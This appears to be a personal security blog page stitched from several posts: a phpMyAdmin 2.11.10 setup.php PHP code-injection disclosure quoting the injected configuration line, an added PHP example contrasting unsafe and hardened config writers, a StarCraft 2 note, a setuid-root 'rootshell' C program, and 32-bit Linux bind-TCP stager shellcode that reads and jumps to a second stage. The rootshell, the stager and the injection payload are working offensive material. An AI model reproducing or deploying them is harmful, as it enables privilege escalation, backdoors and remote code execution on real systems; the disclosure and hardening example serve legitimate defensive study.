All Articles

phpMyAdmin "setup.php" Arbitrary PHP Code Injection

Hello,

I found a PHP command execution vulnerability in scripts/setup.php
included in phpMyAdmin 2.11.10.

The vulnerability I found is similar to CVE-2009-1151
(http://www.securityfocus.com/bid/34236), but a bit different.
It affects the latest version of phpMyAdmin 2.X.

See the attached file, which is a sample exploit PHP program
for phpMyAdmin 2.11.10 (curl library required).

The attached exploit program creates a config/config.inc.php file
on the target machine, which includes the line below.

$cfg['Servers'][$i]['AllowDeny']['order']['a']['b'][''.phpinfo().''] = '1';

When the config.inc.php is loaded, phpinfo() will be executed.

The cause is line 521 in scripts/setup.php.

520: if ($type == 'string') {
521: $ret .= get_cfg_val($name . "['$k']", $v);
522: } elseif ($type == 'int') {

If the input array is deeply nested, the array key is neither
properly encoded nor checked.

exploint.php (1.42 K, downloads: 21, uploaded: 2010-08-23 00:35)
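The following is an added example; it is not part of the original advisory and not phpMyAdmin's own code. It models the pattern the advisory points at: a recursive config writer that interpolates array keys straight into generated PHP source (get_cfg_val_unsafe, a stand-in for the page's get_cfg_val), beside a hardened version (get_cfg_val_safe, an assumed name) that allow-lists key characters and emits every string key through var_export(), so a key can never close the surrounding string literal. The input arrays and the $prefix value are constructed here to reproduce the nested-key shape described above; the function name embedded in the crafted key is only a marker in the generated text and is never executed.

```php
<?php
// Added example (not phpMyAdmin code): a config writer that interpolates
// keys into PHP source, beside a hardened writer that validates and quotes them.

// Vulnerable-style writer, modelled on the pattern in the advisory:
// the key $k is concatenated into the generated source without encoding.
function get_cfg_val_unsafe(string $name, $value): string
{
    if (is_array($value)) {
        $ret = '';
        foreach ($value as $k => $v) {
            $ret .= get_cfg_val_unsafe($name . "['$k']", $v);
        }
        return $ret;
    }
    // The scalar value is quoted, but the key path in $name was never checked.
    return $name . ' = ' . var_export($value, true) . ";\n";
}

// Hardened writer (assumed name): every key must match a conservative
// allow-list, integer keys are emitted bare, and string keys go through
// var_export(), which quotes and escapes them.
function get_cfg_val_safe(string $name, $value): string
{
    if (is_array($value)) {
        $ret = '';
        foreach ($value as $k => $v) {
            if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', (string) $k)) {
                throw new InvalidArgumentException(
                    'rejected config key ' . var_export((string) $k, true)
                );
            }
            $quoted = is_int($k) ? (string) $k : var_export($k, true);
            $ret .= get_cfg_val_safe($name . '[' . $quoted . ']', $v);
        }
        return $ret;
    }
    if ($value !== null && !is_scalar($value)) {
        throw new InvalidArgumentException('unsupported config value type');
    }
    return $name . ' = ' . var_export($value, true) . ";\n";
}

// Constructed inputs: the first has the nested-key shape from the advisory,
// the second is ordinary configuration data.
$crafted = ['AllowDeny' => ['order' => ['a' => ['b' => ["'.phpinfo().'" => '1']]]]];
$benign  = ['AllowDeny' => ['order' => 'deny,allow', 'rules' => ['allow root from localhost']]];
$prefix  = "\$cfg['Servers'][\$i]";

echo "--- unsafe writer, crafted key (the key becomes live code in the output) ---\n";
echo get_cfg_val_unsafe($prefix, $crafted);

echo "--- hardened writer, crafted key ---\n";
try {
    echo get_cfg_val_safe($prefix, $crafted);
} catch (InvalidArgumentException $e) {
    echo 'refused: ' . $e->getMessage() . "\n";
}

echo "--- hardened writer, benign keys ---\n";
echo get_cfg_val_safe($prefix, $benign);
```

Run with `php example.php`: the unsafe writer reproduces the line quoted in the advisory, the hardened writer throws on the crafted key, and the benign keys come out quoted. Validating keys before concatenating them into source is the minimum check any setup script that writes executable configuration needs; writing configuration as PHP source at all is the deeper risk, and a data format such as JSON parsed at load time removes it entirely.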

Battle.net StarCraft 2 Experience

First match on Battle.net; I think I got matched with a foreign kid.
 

[Images: betnet.jpg, sc_2.jpg, 10分.jpg]

Recent New Project

Testing the success rate; will open-source it once it feels OK.

[Image: newproject.png]

exec in notty mode rootshell

#include <unistd.h>
/* Runs argv[1] via /bin/sh -c as uid/gid 0; relies on the binary being setuid root. */
int main(int argc, char **argv){
        if (argc < 2) return 1;
        setgid(0); setuid(0);
        execl("/bin/sh","sh","-c",argv[1],(char *)0); /* arg list must end in a null pointer */
        return 1;
}

stager_sock_bind.asm

;;
; meta-shortname=Linux Bind TCP Stager
;;
BITS   32
GLOBAL _start

_start:
	xor  ebx, ebx

socket:
	push ebx
	inc  ebx
	push ebx
	push byte 0x2
	push byte 0x66
	pop  eax
	cdq
	mov  ecx, esp
	int  0x80
	xchg eax, esi

bind:
	inc  ebx
	push edx
	push word 0xbfbf ; port: 49087
	push bx
	mov  ecx, esp
	push byte 0x66
	pop  eax
	push eax
	push ecx
	push esi
	mov  ecx, esp
	int  0x80

listen:
	mov  al, 0x66
	shl  ebx, 1
	int  0x80

accept:
	push edx
	push edx
	push esi
	inc  ebx
	mov  ecx, esp
	mov  al, 0x66
	int  0x80
	xchg eax, ebx

%ifndef USE_SINGLE_STAGE

read:
	mov  dh, 0xc
	mov  al, 0x3
	int  0x80
	mov  edi, ebx    ; not necessary if second stages use ebx instead of edi 
	                 ; for fd
	jmp  ecx

%else
	%ifdef FD_REG_EDI
	mov  edi, ebx
	%endif
%endif